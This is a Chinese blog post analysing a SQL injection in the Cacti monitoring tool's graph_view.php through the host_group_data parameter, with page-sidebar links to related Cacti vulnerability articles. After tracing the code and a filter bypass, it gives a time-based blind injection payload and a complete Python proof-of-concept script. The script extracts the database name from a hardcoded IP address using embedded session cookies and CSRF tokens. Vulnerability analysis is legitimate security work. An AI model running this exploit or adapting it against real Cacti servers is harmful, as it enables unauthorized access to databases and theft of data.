view.php 漏洞,Cacti graph_view.php SQL注入漏洞

最新推荐文章于 2024-08-19 22:44:02 发布
最新推荐文章于 2024-08-19 22:44:02 发布
阅读量284 收藏
点赞数
文章标签: view.php 漏洞

存在问题的文件/cacti/graph_view.php:/* ================= input validation ================= */

input_validate_input_number(get_request_var_request('branch_id'));

input_validate_input_number(get_request_var_request('hide'));

input_validate_input_number(get_request_var_request('tree_id'));

input_validate_input_number(get_request_var_request('leaf_id'));

input_validate_input_number(get_request_var_request('rra_id'));

input_validate_input_regex(get_request_var_request('graph_list'), '^([\,0-9]+)$');

input_validate_input_regex(get_request_var_request('graph_add'), '^([\,0-9]+)$');

input_validate_input_regex(get_request_var_request('graph_remove'), '^([\,0-9]+)$');

input_validate_input_regex(get_request_var_request('nodeid'), '^([_a-z0-9]+)$');

/* ==================================================== */

...

switch ($_REQUEST['action']) {

case 'tree_content':

validate_tree_vars(); // attesion here

...

grow_right_pane_tree((isset($_REQUEST['tree_id']) ? $_REQUEST['tree_id'] : 0), (isset($_REQUEST['leaf_id']) ? $_REQUEST['leaf_id'] : 0), (isset($_REQUEST['host_group_data'])

? urldecode($_REQUEST['host_group_data']) : 0));

}

这里我们跟下function grow_right_pane_tree函数,存在于/lib/html_tree.php :

function grow_right_pane_tree($tree_id, $leaf_id, $host_group_data)

{

global $current_user, $config, $graphs_per_page, $graph_timeshifts;

...

$host_group_data_array = explode(':', $host_group_data);

if ($host_group_data_array[0] == 'graph_template') {

$host_group_data_name = 'Graph Template: ' . db_fetch_cell('select name from graph_templates where id=' . $host_group_data_array[1]); //这里很像是可以产生注入的地方

$graph_template_id = $host_group_data_array[1];

}

...

}

这看起来好像是可以产生注入的地方,但是validate_tree_vars()是一个变态的过滤函数function validate_tree_vars() {

/* ================= input validation ================= */

input_validate_input_number(get_request_var_request('graphs'));

input_validate_input_number(get_request_var_request('columns'));

input_validate_input_number(get_request_var_request('page'));

input_validate_input_number(get_request_var_request('tree_id'));

input_validate_input_number(get_request_var_request('leaf_id'));

/* ==================================================== */

/* clean up search string */

if (isset($_REQUEST['filter'])) {

$_REQUEST['filter'] = sanitize_search_string(get_request_var_request('filter'));

}

/* clean up search string */

if (isset($_REQUEST['thumbnails'])) {

$_REQUEST['thumbnails'] = sanitize_search_string(get_request_var_request('thumbnails'));

}

/* clean up host_group_data string */

if (isset($_REQUEST['host_group_data'])) {

$_REQUEST['host_group_data'] = sanitize_search_string(get_request_var_request('host_group_data'));

继续跟踪函数sanitize_search_string,在/lib/functions.php:function sanitize_search_string($string) {

static $drop_char_match = array('^', '$', '', '`', '\'', '"', '|', ',', '?', '+', '[', ']', '{', '}', '#', ';', '!', '=', '*');

static $drop_char_replace = array(' ', ' ', ' ', ' ', '', '', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ');

/* Replace line endings by a space */

$string = preg_replace('/[\n\r]/is', ' ', $string);

/* HTML entities like */

$string = preg_replace('/\b&[a-z]+;\b/', ' ', $string);

/* Remove URL's */

$string = preg_replace('/\b[a-z0-9]+:\/\/[a-z0-9\.\-]+(\/[a-z0-9\?\.%_\-\+=&\/]+)?/', ' ', $string);

/* Filter out strange characters like ^, $, &, change "it's" to "its" */

for($i = 0; $i < count($drop_char_match); $i++) {

$string = str_replace($drop_char_match[$i], $drop_char_replace[$i], $string);

}

return $string;

}

这貌似过滤的很严格,但是可以利用一些mysql的特性去绕过.让sql注入存活过来

首先登陆cacti

然后去请求http://target/cacti/graph_view.php

POST发送Data: ____csrf_magic=sid:b0349195c55bddec2f2be859e0f394539ea4569a,1458781575&host_group_data=graph_template:1 union select case when ord(substring((select version()) from 1 for 1)) between 53 and 53 then sleep(5) else 0 end

如果mysql成功延时5秒,那么version()第一个是5

写个poc来验证下#!/usr/bin/python

# -*- coding: UTF-8 -*-

import httplib

import time

import string

import sys

import random

import urllib

import math

headers = {

'Content-Type': 'application/x-www-form-urlencoded',

'Cookie':

'cacti_zoom=zoomMode%3Dquick%2CzoomOutPositioning%3Dcenter%2CzoomOutFactor%3D2%2CzoomMarkers%3Dtrue%2CzoomTimestamps%3Dauto%2Czoom3rdMouseButton%3Dfalse; Cacti=7a3e072f5ab62febf94fbedda5128fd0'

}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print 'Starting to retrive MySQL DB:'

db = ''

user = ''

for i in range(1, 6):

for payload in payloads:

s = "__csrf_magic=sid:c766dcdb84bc21215af88d112bc9c4f2edc517b4,1458794525&host_group_data=graph_template:1 union select case when ord(substring((select database()) from %s for %s)) between %s and %s then sleep(5) else 0 end" % (

i, i, ord(payload), ord(payload))

conn = httplib.HTTPConnection('133.130.98.98', timeout=60)

conn.request(method='POST',

url='/cacti/graph_view.php?action=tree_content',

body=s,

headers=headers)

start_time = time.time()

conn.getresponse()

conn.close()

print '.',

if time.time() - start_time > 5.0:

db += payload

print '\n\n[In progress]', db,

break

print '\n\n[Done] Current database is %s ' % (db)

bd95248979b67d72cfda207eef90ded5.png

北山南湖
关注
Cacti命令执行漏洞复现(CVE-2022-46169)
0xSec
02-02 4142
Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严重。
漏洞复现】Cacti-graph_view-SQL注入(CVE-2023-39361)
知黑而守白
01-20 154
Cacti是一套基于 PHP、MySQL、SNMP 及 RRDTool 开发的网络流量监测图形分析工具。Cacti graph_view接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
cacti graphs new.php,cacti后台SQL注入漏洞 --解决
weixin_33315077的博客
03-27 603
cacti后台SQL注入漏洞简介cacti后台SQL注入漏洞cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏。解决方法在第4步1. 漏洞描述other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the ...
Cacti SQL注入漏洞分析(CVE-2023-51448)
最新发布
shelter1234567的博客
08-19 528
Cacti 为全球用户提供强大且可扩展的运营监控和故障管理框架。它还是一个完整的网络绘图解决方案,旨在利用的数据存储和绘图功能。Cacti 包括一个完全分布式和容错的数据收集框架、用于设备、图表和树的高级基于模板的自动化功能、多种数据采集方法、通过插件进行扩展的能力、基于角色的用户、组和域管理功能,此外还有一个主题引擎和多种语言支持,所有这些都是开箱即用的。Cacti pollers.php文件接口在SQL注入漏洞
cacti lib/rrd.php rrdtoll 1343,Cacti SQL注入漏洞(CNVD-2015-08486)
weixin_42651748的博客
04-01 279
### 0x01 漏洞简述CactiCacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。### 0x02 漏洞细节漏洞存在于文件/cacti-0.8.8f/graph....
Cacti命令执行漏洞分析 (CVE-2022-46169)
whoami
12-07 4173
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item =POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行。Cacti < 1.2.23从漏洞补丁可以看出,本次漏洞点主要存在于lib/functions.php、remote_age
Cacti 前台SQL注入漏洞复现(CVE-2023-39361)
0xSec
01-19 1120
漏洞存在于graph_view.php文件中。默认情况下,访客用户无需身份验证即可访问graph_view.php,在启用情况下使用时会导致SQL注入漏洞。攻击者可能利用此漏洞执行远程代码或篡夺管理权限。Growth_right_pane_tree函数包含从graph_view.php文件调用的漏洞。在tree_content情况下,用户输入通过html_validate_tree_vars函数进行验证。如果tree_id参数大于0,则调用grow_right_pane_tree函数。
cacti安装搭建
破茧
04-26 2013
&#13; cacti是用php语言实现的一个软件,使用snmp服务获取数据,nnmp关系着数据的收集;使用rrdtool储存和更新数据;当用户需要查看数据的时候用rrdtool生成图表;mysql配合php程序存储一些变量数据并对变量数据进行调用,如:主机名、主机ip、端口号等变量。 cacti监控结构图 C/S模式,采集监测数据 B/S 模式,管理监测平台 mysql 保...
5、Cacti监控服务
ma_wb_icey的博客
08-23 298
一、常用监控平台 1、Cacti 流量与性能检测为主 http://www.cacti.net/ 展示平台:B/S 收集数据:SNMP(简单网络管理协议) Simple Network Management Protocol NMP: 数据收集: SNMP:简单网络管理协议 V1:最老消耗的资源最低,不支持加密机认证 V2:加密 V3:认证 ICMP: 判断公网是否存
监控服务--Cacti
weixin_46686835的博客
01-18 808
监控服务–Cacti Cacti简介 Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。它通过snmpget来获取数据,使用 RRDtool绘画图形,以监控流量和性能为主。Cacti主要是提供了一个监控的框架,真正数据收集的是SNMP,数据展示的是TTDTOOL,Cacti的延时是比较大的,默认5分钟刷新一次。 Cacti架构: Cacti原理 1.构造 1)Snmp Simple Network Management Protocal(简单网络管理协议):采
CVE-2020-8813:Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用
03-08
CVE-2020-8813 Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用 Cacti v1.2.8身份验证前远程执行代码 仙人掌v1.2.8验证后远程执行代码
漏洞复现-Cacti命令执行漏洞 (CVE-2022-46169)
玄道的网安博客
08-11 489
1.漏洞描述是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具,可为用户提供强大且可扩展的操作监控和故障管理框架。该漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量绕过身份验证,再通过构造特殊的$poller_id 参数来触发proc_open() 函数,成功利用此漏洞可在目标服务器上执行任意命令,获取服务器的控制权限。2.影响版本3.影响范围。
Cacti 前台命令注入漏洞
SwBack的博客
05-08 1417
Cacti是一个服务器监控与管理平台。基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具. 在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。
cacti cmd.php,Cacti cmd.php脚本远程SQL注入漏洞
weixin_39901213的博客
04-08 244
<?phpprint_r('--------------------------------------------------------------------------------Cacti <= 0.8.6i "cmd.php" popen() injectionby rgoddork: intitle:"login to cacti"mail: retrog at alic...
严重的Cacti漏洞可导致攻击者执行远程代码
smellycat000的专栏
05-14 223
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛使用的网络监控工具 Cacti 最近发布重要安全更新,修复了一系列漏洞,其中最严重的是CVE-2024-25641,CVSS评分为9.1。严重的RCE漏洞CVE-2024-25641可导致拥有“导入模板”权限的认证用户在托管 Cacti 应用的服务器上执行任意PHP代码。该漏洞是因为对函数 import_package() 中所上传的 XML...
Cacti 前台命令注入漏洞(CVE-2022-46169)
shierbai的博客
05-25 231
在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。这个漏洞的利用需要Cacti应用中至少存在一个类似是`POLLER_ACTION_SCRIPT_PHP`的采集器。环境启动后,访问`http://your-ip:8080`会跳转到登录页面。使用admin/admin作为账号密码登录,并根据页面中的提示进行初始化。实际上初始化的过程就是不断点击“下一步”,直到安装成功。其中``包裹的内容会被作为命令执行。
Cacti 'graph_xport.php' SQL注入漏洞
weixin_30765319的博客
04-03 189
漏洞版本: Cacti < 0.8.8b 漏洞描述: Bugtraq ID:66555 Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。 Cacti 'graph_xport.php'存在SQL注入漏洞,成功利用后可使攻击者执行未授权数据库操作。 <* 参考 http://www.securityfo...
cacti lib/rrd.php rrdtoll 1343,CVE-2020-8813:Cactiv1.2.8身份验证远程代码执行漏洞分析 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联...
weixin_39526651的博客
04-01 250
0x01 Cacti 介绍Cacti是一个网络图形解决方案,利用RRDTool的数据存储和图形功能,Cacti提供了现成的高级图形模板,多种数据采集方法和用户管理功能。所有这些都封装在一个直观,易于使用的界面中。0x02 漏洞分析通过分析Cacti代码中的多个函数的代码发现了此漏洞,必须将多个因素联系在一起才能执行代码,该漏洞主要发生在攻击者尝试将恶意代码注入“ Cacti” cookie变量...
Cacti 1.2.3模板发布:网络流量图形分析工具
资源摘要信息:"Cacti是一款网络流量监测图形分析工具,它主要基于PHP、MySQL、SNMP和RRDTool进行开发。该工具能够通过snmpget来获取数据,并利用RRDtool来绘制相应的图形,从而实现对网络流量的实时监控和分析。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值